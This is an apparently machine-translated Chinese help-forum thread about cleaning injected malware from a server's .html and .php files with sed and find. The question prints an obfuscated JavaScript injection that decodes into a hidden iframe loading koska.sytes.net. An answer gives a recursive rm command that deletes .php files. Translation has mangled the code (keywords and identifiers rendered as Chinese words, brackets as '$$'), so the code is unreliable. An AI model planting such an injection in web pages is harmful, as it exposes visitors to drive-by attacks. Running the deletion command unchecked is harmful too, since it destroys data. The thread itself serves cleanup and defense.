如何使用 sed 刪除多個文件中的惡意軟體程式碼?
我在伺服器上的許多 .html 和 .php 文件中都有這個惡意軟體程式碼。我需要使用刪除它們
sed -i expression
- 搜尋目錄下的所有文件
/home/
- 查找受感染的文件
- 通過用空格替換程式碼來刪除程式碼
VAR usikwseoomg =‘PaBUTyjaZYg3cPaBUTyjaZYg69PaBUTyjaZYg66’; VAR nimbchnzujc =‘PaBUTyjaZYg72’; VAR szwtgmqzekr =‘PaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg20PaBUTyjaZYg6ePaBUTyjaZYg61PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3dPaBUTyjaZYg22’; VAR yvofadunjkv =‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’; VAR ylydzxyjaci =‘PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg77PaBUTyjaZYg69PaBUTyjaZYg64PaBUTyjaZYg74PaBUTyjaZYg68PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg31PaBUTyjaZYg22PaBUTyjaZYg20PaBUTyjaZYg68PaBUTyjaZYg65PaBUTyjaZYg69PaBUTyjaZYg67PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg3dPaBUTyjaZYg22PaBUTyjaZYg30PaBUTyjaZYg22’; VAR xwojmnoxfbs =‘PaBUTyjaZYg20PaBUTyjaZYg73PaBUTyjaZYg72PaBUTyjaZYg63PaBUTyjaZYg3dPaBUTyjaZYg22’; VAR mgsybgilcfx =‘PaBUTyjaZYg68PaBUTyjaZYg74PaBUTyjaZYg74PaBUTyjaZYg70PaBUTyjaZYg3aPaBUTyjaZYg2fPaBUTyjaZYg2f’; VAR nixyhgyjouf =‘koska.sytes.net/phl/logs/index.php’;var nesrtqwuirb =’’;VAR rqchyojemkn =‘PaBUTyjaZYg6dPaBUTyjaZYg67PaBUTyjaZYg79PaBUTyjaZYg65PaBUTyjaZYg64PaBUTyjaZYg61PaBUTyjaZYg67PaBUTyjaZYg70PaBUTyjaZYg7aPaBUTyjaZYg63PaBUTyjaZYg76’; VAR niupgeebkhf =’’; VAR yyzsvtbnudd =‘PaBUTyjaZYg3cPaBUTyjaZYg2fPaBUTyjaZYg69PaBUTyjaZYg66’;var tlclvgxfthn = ‘PaBUTyjaZYg72PaBUTyjaZYg61’; var zxttbudjafh = ‘PaBUTyjaZYg6dPaBUTyjaZYg65PaBUTyjaZYg3e’; var yydszqnduko = 新數組 (); yydszqnduko$$ 0 $$=新數組(usikwseoomg+nimbchnzujc+szwtgmqzekr+yvofadunjkv+ylydzxyjaci+xwojmnoxfbs+mgsybgilcfx+nixyhgyjouf+nesrtqwuirb+rqchyojemkn+niupgeebkhf+yyzsvtbnudd+tlclvgxfthn+zxttbudjafh);文件$$ ‘PaBUTyjaZYgwPaBUTyjaZYgrPaBUTyjaZYgiPaBUTyjaZYgtPaBUTyjaZYgePaBUTyjaZYg’.replace(/PaBUTyjaZYg/g,’’) $$(窗戶$$ ‘PaBUTyjaZYguPaBUTyjaZYgnPaBUTyjaZYgePaBUTyjaZYgsPaBUTyjaZYgcPaBUTyjaZYgaPaBUTyjaZYgpPaBUTyjaZYgePaBUTyjaZYg’.replace(/PaBUTyjaZYg/g,’’) $$(yydszqnduko.toString ().replace (/PaBUTyjaZYg/g, ‘%’)));
我認為這可以做到:
find /home \( -name "*.html" -o -name "*.php" \) -exec sed -i.bak 's/<script.*PaBUTyjaZYg.*script>//g' \{\} \;
來自評論“刪除所有文件的名稱和副檔名為 .php”
find /home -name "*[0-9]*.php" -exec rm \{\} \;
但首先,使用 echo 而不是 rm 執行它,以確保不會刪除不想刪除的內容。
我想說一個更好/更安全的解決方案是從乾淨的備份中恢復這些文件。